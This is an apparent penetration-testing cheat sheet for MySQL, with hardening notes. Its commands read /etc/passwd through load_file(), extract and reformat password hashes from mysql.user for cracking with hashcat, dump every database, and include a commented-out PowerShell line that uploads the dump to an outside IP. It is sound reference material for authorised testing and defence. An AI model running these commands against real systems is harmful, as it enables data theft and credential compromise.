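#####
MySQL
#####

******
Basics
******

.. code-block:: bash

    mysql -h SRV -D DBNAME -u USR -e 'show tables;' --password=PASS
    mysql -h SRV -D DBNAME -u USR -e 'select * from TABLE;' --password=PASS

.. note::

    A password passed as ``--password=PASS`` is stored in shell history and can be visible to other local users in the process list. Use ``-p`` (interactive prompt) or an option file / ``mysql_config_editor`` login path when the credential must not leak on the host you are working from.

|

******
SQLMAP
******

``-d`` makes sqlmap connect directly to the database with valid credentials (no injection point involved).

.. code-block:: bash

    sqlmap -d mysql://USR:PASS@SRV:3306/DBNAME -D DBNAME -T TABLE --dump --flush-session --batch

|

*********
Read File
*********

.. code-block:: bash

    # Read file (cat for correct render)
    mysql -h SRV -D DBNAME -u USR -e 'select load_file("/etc/passwd")' --password=PASS | echo -e "$(cat)"

.. note::

    ``load_file()`` returns NULL unless the account holds the ``FILE`` privilege, the file is readable by the MySQL server process, and the path is allowed by ``secure_file_priv``. Hardening: do not grant ``FILE`` to application accounts and set ``secure_file_priv`` to a dedicated directory.

|

******
Hashes
******

|

.. code-block:: bash

    mysql -h localhost -u USER -D DB --password='PASS' -e 'select user,plugin,hex(authentication_string) from mysql.user;'

|
| caching_sha2_password (hashcat 7401)

.. code-block:: bash

    cat <<'EOF'| sed 's#24412430303524\(.\{40\}\)\(.\{64\}\)#$mysql$A$005*\1*\2#g' | tee /tmp/hashestable
    | dev | caching_sha2_password | 244124303035240D172F787569054E322523067049563540383D176F31786178584431332F4D6830726C6C6F652F5771636D6D6142444D46367237776A764647676F54536142 |
    EOF

.. code-block:: bash

    cat /tmp/hashestable | grep caching_sha2_password | tr -d ' '|cut -d'|' -f4 | tee /tmp/hashes

.. code-block:: bash

    hashcat -m 7401 -o /tmp/output.txt /tmp/hashes /usr/share/wordlists/rockyou.txt --potfile-path=/home/user/HASHCATPOT

.. note::

    Reading ``authentication_string`` requires an account that can select from ``mysql.user``, so restricting that access is the main control here. The files written under ``/tmp`` and the hashcat potfile contain credential material: keep them out of shared locations and remove them once the engagement is over.

|

****
Dump
****

.. code-block:: powershell

    C:\xampp\mysql\bin\mysqldump.exe -h localhost -u root --all-databases --force > /r/data.sql
    # powershell -c "(New-Object System.Net.WebClient).UploadFile('http://10.10.14.2:8888/','/r/data.sql')"

.. note::

    ``--force`` makes mysqldump continue after SQL errors, so check the output for completeness. The dump holds every database, including the ``mysql`` system schema. The commented-out transfer is plain HTTP, so the file would cross the network unencrypted.

|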